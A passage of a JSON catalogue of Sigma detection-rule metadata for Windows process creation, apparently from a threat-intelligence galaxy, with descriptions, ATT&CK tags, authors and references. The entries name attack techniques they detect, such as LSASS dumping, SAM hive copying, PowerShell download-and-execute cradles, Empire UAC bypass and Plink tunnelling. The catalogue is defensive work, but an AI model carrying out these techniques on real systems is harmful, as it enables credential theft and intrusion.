- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_openwith.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218"
- ],
- "creation_date": "2019/10/12",
- "filename": "proc_creation_win_susp_openwith.yml",
- "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)",
- "level": "high",
- "falsepositive": [
- "Legitimate use of OpenWith.exe by legitimate user"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects EnableUnsafeClientMailRules used for Script Execution from Outlook",
- "uuid": "e212d415-0e93-435f-9e1a-f29005bb4723",
- "value": "Suspicious Execution from Outlook",
- "meta": {
- "refs": [
- "https://github.com/sensepost/ruler",
- "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059",
- "attack.t1202"
- ],
- "creation_date": "2018/12/27",
- "filename": "proc_creation_win_susp_outlook.yml",
- "author": "Markus Neis",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a suspicious program execution in Outlook temp folder",
- "uuid": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39",
- "value": "Execution in Outlook Temp Folder",
- "meta": {
- "refs": [
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook_temp.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1566.001"
- ],
- "creation_date": "2019/10/01",
- "filename": "proc_creation_win_susp_outlook_temp.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program",
- "uuid": "cbec226f-63d9-4eca-9f52-dfb6652f24df",
- "value": "Suspicious Process Parents",
- "meta": {
- "refs": [
- "https://twitter.com/x86matthew/status/1505476263464607744?s=12",
- "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml"
- ],
- "tags": "No established tags",
- "creation_date": "2022/03/21",
- "filename": "proc_creation_win_susp_parents.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.",
- "uuid": "cbb9e3d1-2386-4e59-912e-62f1484f7a89",
- "value": "Conhost Spawned By Suspicious Parent Process",
- "meta": {
- "refs": [
- "https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parent_of_conhost.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059"
- ],
- "creation_date": "2022/09/28",
- "filename": "proc_creation_win_susp_parent_of_conhost.yml",
- "author": "Tim Rauch",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff",
- "uuid": "fca949cc-79ca-446e-8064-01aa7e52ece5",
- "value": "PCHunter Usage",
- "meta": {
- "refs": [
- "http://www.xuetr.com/",
- "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/",
- "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml"
- ],
- "tags": "No established tags",
- "creation_date": "2022/10/10",
- "filename": "proc_creation_win_susp_pchunter.yml",
- "author": "Florian Roth, Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.",
- "uuid": "9386d78a-7207-4048-9c9f-a93a7c2d1c05",
- "value": "Code Execution via Pcwutl.dll",
- "meta": {
- "refs": [
- "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/",
- "https://twitter.com/harr0ey/status/989617817849876488",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pcwutl.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.011"
- ],
- "creation_date": "2020/10/05",
- "filename": "proc_creation_win_susp_pcwutl.yml",
- "author": "Julia Fomina, oscd.community",
- "level": "medium",
- "falsepositive": [
- "Use of Program Compatibility Troubleshooter Helper"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)",
- "uuid": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e",
- "value": "Execute Code with Pester.bat",
- "meta": {
- "refs": [
- "https://twitter.com/Oddvarmoe/status/993383596244258816",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001",
- "attack.defense_evasion",
- "attack.t1216"
- ],
- "creation_date": "2020/10/08",
- "filename": "proc_creation_win_susp_pester.yml",
- "author": "Julia Fomina, oscd.community",
- "level": "medium",
- "falsepositive": [
- "Legitimate use of Pester for writing tests for Powershell scripts and modules"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)",
- "uuid": "18988e1b-9087-4f8a-82fe-0414dce49878",
- "value": "Execute Code with Pester.bat as Parent",
- "meta": {
- "refs": [
- "https://twitter.com/Oddvarmoe/status/993383596244258816",
- "https://twitter.com/_st0pp3r_/status/1560072680887525378",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001",
- "attack.defense_evasion",
- "attack.t1216"
- ],
- "creation_date": "2022/08/20",
- "filename": "proc_creation_win_susp_pester_parent.yml",
- "author": "frack113, Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Legitimate use of Pester for writing tests for Powershell scripts and modules"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example",
- "uuid": "54786ddc-5b8a-11ed-9b6a-0242ac120002",
- "value": "Suspicious Ping And Del Combination",
- "meta": {
- "refs": [
- "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_del.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1070.004"
- ],
- "creation_date": "2022/11/03",
- "filename": "proc_creation_win_susp_ping_del.yml",
- "author": "Ilya Krestinichev",
- "level": "high",
- "falsepositive": [
- "False positive could occur in admin scripts that execute inline"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a ping command that uses a hex encoded IP address",
- "uuid": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd",
- "value": "Ping Hex IP",
- "meta": {
- "refs": [
- "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna",
- "https://twitter.com/vysecurity/status/977198418354491392",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1140",
- "attack.t1027"
- ],
- "creation_date": "2018/03/23",
- "filename": "proc_creation_win_susp_ping_hex_ip.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unlikely, because no sane admin pings IP addresses in a hexadecimal form"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious Plink tunnel port forwarding to a local port",
- "uuid": "48a61b29-389f-4032-b317-b30de6b95314",
- "value": "Suspicious Plink Port Forwarding",
- "meta": {
- "refs": [
- "https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/",
- "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1572",
- "attack.lateral_movement",
- "attack.t1021.001"
- ],
- "creation_date": "2021/01/19",
- "filename": "proc_creation_win_susp_plink_port_forward.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Administrative activity using a remote port forwarding to a local port"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Execution of plink to perform data exfiltration and tunneling",
- "uuid": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da",
- "value": "Suspicious Plink Usage RDP Tunneling",
- "meta": {
- "refs": [
- "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_usage.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1572"
- ],
- "creation_date": "2022/08/04",
- "filename": "proc_creation_win_susp_plink_usage.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Administrative activity"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout",
- "uuid": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b",
- "value": "Suspicious Powercfg Execution To Change Lock Screen Timeout",
- "meta": {
- "refs": [
- "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html",
- "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powercfg.yml"
- ],
- "tags": [
- "attack.defense_evasion"
- ],
- "creation_date": "2022/11/18",
- "filename": "proc_creation_win_susp_powercfg.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains",
- "uuid": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c",
- "value": "Suspicious PowerShell Encoded Command Patterns",
- "meta": {
- "refs": [
- "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2022/05/24",
- "filename": "proc_creation_win_susp_powershell_cmd_patterns.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Other tools that work with encoded scripts in the command line instead of script files"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious ways to download files or content using PowerShell",
- "uuid": "6e897651-f157-4d8f-aaeb-df8151488385",
- "value": "PowerShell Web Download",
- "meta": {
- "refs": [
- "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_cradles.yml"
- ],
- "tags": "No established tags",
- "creation_date": "2022/03/24",
- "filename": "proc_creation_win_susp_powershell_download_cradles.yml",
- "author": "Florian Roth",
- "level": "medium",
- "falsepositive": [
- "Scripts or tools that download files"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious ways to download files or content and execute them using PowerShell",
- "uuid": "85b0b087-eddf-4a2b-b033-d771fa2b9775",
- "value": "PowerShell Web Download and Execution",
- "meta": {
- "refs": [
- "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_iex.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059"
- ],
- "creation_date": "2022/03/24",
- "filename": "proc_creation_win_susp_powershell_download_iex.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Scripts or tools that download files and execute them"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious powershell command line parameters used in Empire",
- "uuid": "79f4ede3-402e-41c8-bc3e-ebbf5f162581",
- "value": "Empire PowerShell Launch Parameters",
- "meta": {
- "refs": [
- "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165",
- "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191",
- "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178",
- "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2019/04/20",
- "filename": "proc_creation_win_susp_powershell_empire_launch.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Other tools that incidentally use the same command line parameters"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects some Empire PowerShell UAC bypass methods",
- "uuid": "3268b746-88d8-4cd3-bffc-30077d02c787",
- "value": "Empire PowerShell UAC Bypass",
- "meta": {
- "refs": [
- "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64",
- "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_uac_bypass.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1548.002",
- "car.2019-04-001"
- ],
- "creation_date": "2019/08/30",
- "filename": "proc_creation_win_susp_powershell_empire_uac_bypass.yml",
- "author": "Ecco",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Commandline to launch powershell with a base64 payload",
- "uuid": "fb843269-508c-4b76-8b8d-88679db22ce7",
- "value": "Suspicious Execution of Powershell with Base64",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets",
- "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/",
- "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2022/01/02",
- "filename": "proc_creation_win_susp_powershell_encode.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious encoded character syntax often used for defense evasion",
- "uuid": "e312efd0-35a1-407f-8439-b8d434b438a6",
- "value": "PowerShell Encoded Character Syntax",
- "meta": {
- "refs": [
- "https://twitter.com/0gtweet/status/1281103918693482496",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_param.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001",
- "attack.defense_evasion",
- "attack.t1027"
- ],
- "creation_date": "2020/07/09",
- "filename": "proc_creation_win_susp_powershell_encoded_param.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)",
- "uuid": "ca2092a1-c273-4878-9b4b-0d60115bf5ea",
- "value": "Suspicious Encoded PowerShell Command Line",
- "meta": {
- "refs": [
- "https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_enc_cmd.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2018/09/03",
- "filename": "proc_creation_win_susp_powershell_enc_cmd.yml",
- "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community",
- "level": "high",
- "falsepositive": "No established falsepositives",
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity",
- "uuid": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349",
- "value": "PowerShell Get-Process LSASS",
- "meta": {
- "refs": [
- "https://twitter.com/PythonResponder/status/1385064506049630211",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1552.004"
- ],
- "creation_date": "2021/04/23",
- "filename": "proc_creation_win_susp_powershell_getprocess_lsass.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines",
- "uuid": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0",
- "value": "Malicious Base64 Encoded PowerShell Keywords in Command Lines",
- "meta": {
- "refs": [
- "http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_hidden_b64_cmd.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2019/01/16",
- "filename": "proc_creation_win_susp_powershell_hidden_b64_cmd.yml",
- "author": "John Lambert (rule)",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious ways to run Invoke-Execution using IEX acronym",
- "uuid": "09576804-7a05-458e-a817-eb718ca91f54",
- "value": "Suspicious PowerShell IEX Execution Patterns",
- "meta": {
- "refs": [
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_iex_patterns.yml"
- ],
- "tags": "No established tags",
- "creation_date": "2022/03/24",
- "filename": "proc_creation_win_susp_powershell_iex_patterns.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Legitimate scripts that use IEX"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious powershell invocations from interpreters or unusual programs",
- "uuid": "95eadcb2-92e4-4ed1-9031-92547773a6db",
- "value": "Suspicious PowerShell Invocation Based on Parent Process",
- "meta": {
- "refs": [
- "https://www.carbonblack.com/2017/03/15/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_combo.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2019/01/16",
- "filename": "proc_creation_win_susp_powershell_parent_combo.yml",
- "author": "Florian Roth",
- "level": "medium",
- "falsepositive": [
- "Microsoft Operations Manager (MOM)",
- "Other scripts"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a suspicious parents of powershell.exe",
- "uuid": "754ed792-634f-40ae-b3bc-e0448d33f695",
- "value": "Suspicious PowerShell Parent Process",
- "meta": {
- "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_process.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2020/03/20",
- "filename": "proc_creation_win_susp_powershell_parent_process.yml",
- "author": "Teymur Kheirkhabarov, Harish Segar (rule)",
- "level": "high",
- "falsepositive": [
- "Other scripts"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious PowerShell scripts accessing SAM hives",
- "uuid": "1af57a4b-460a-4738-9034-db68b880c665",
- "value": "PowerShell SAM Copy",
- "meta": {
- "refs": [
- "https://twitter.com/splinter_code/status/1420546784250769408",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sam_access.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.002"
- 
], - "creation_date": "2021/07/29", - "filename": "proc_creation_win_susp_powershell_sam_access.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious sub processes spawned by PowerShell", - "uuid": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "value": "Suspicious PowerShell Sub Processes", - "meta": { - "refs": [ - "https://twitter.com/ankit_anubhav/status/1518835408502620162", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sub_processes.yml" - ], - "tags": "No established tags", - "creation_date": "2022/04/26", - "filename": "proc_creation_win_susp_powershell_sub_processes.yml", - "author": "Florian Roth, Tim Shelton", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. 
nEt.WEbCliEnT) string as used in obfuscation techniques", - "uuid": "c86133ad-4725-4bd0-8170-210788e0a7ba", - "value": "Net WebClient Casing Anomalies", - "meta": { - "refs": [ - "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_webclient_casing.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/05/24", - "filename": "proc_creation_win_susp_powershell_webclient_casing.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "uuid": "a20391f8-76fb-437b-abc0-dba2df1952c6", - "value": "NodejsTools PressAnyKey Lolbin", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1463526834918854661", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pressynkey_lolbin.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/01/11", - "filename": "proc_creation_win_susp_pressynkey_lolbin.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Attackers can use print.exe for remote file copy", - "uuid": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", - "value": "Abusing Print Executable", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Print/", - "https://twitter.com/Oddvarmoe/status/985518877076541440", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_print.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/05", - "filename": "proc_creation_win_susp_print.yml", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "uuid": "5afee48e-67dd-4e03-a783-f74259dcf998", - "value": "Suspicious Use of Procdump on LSASS", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" - ], - "creation_date": "2018/10/30", - "filename": "proc_creation_win_susp_procdump_lsass.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "uuid": "811e0002-b13b-4a15-9d00-a613fce66e42", - "value": "Process Hacker / System Informer Usage", - "meta": { - "refs": [ - "https://processhacker.sourceforge.io/", - "https://github.com/winsiderss/systeminformer", - 
"https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml" - ], - "tags": "No established tags", - "creation_date": "2022/10/10", - "filename": "proc_creation_win_susp_process_hacker.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Sometimes used by developers or system administrators for debugging purposes" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "uuid": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", - "value": "Suspicious Program Names", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_progname.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/11", - "filename": "proc_creation_win_susp_progname.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate tools that accidentally match on the searched patterns" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects user accept agreement execution in psexec commandline", - "uuid": "730fc21b-eaff-474b-ad23-90fd265d4988", - "value": "Psexec Accepteula Condition", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexec_eula.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569", - "attack.t1021" - ], - "creation_date": "2020/10/30", - "filename": 
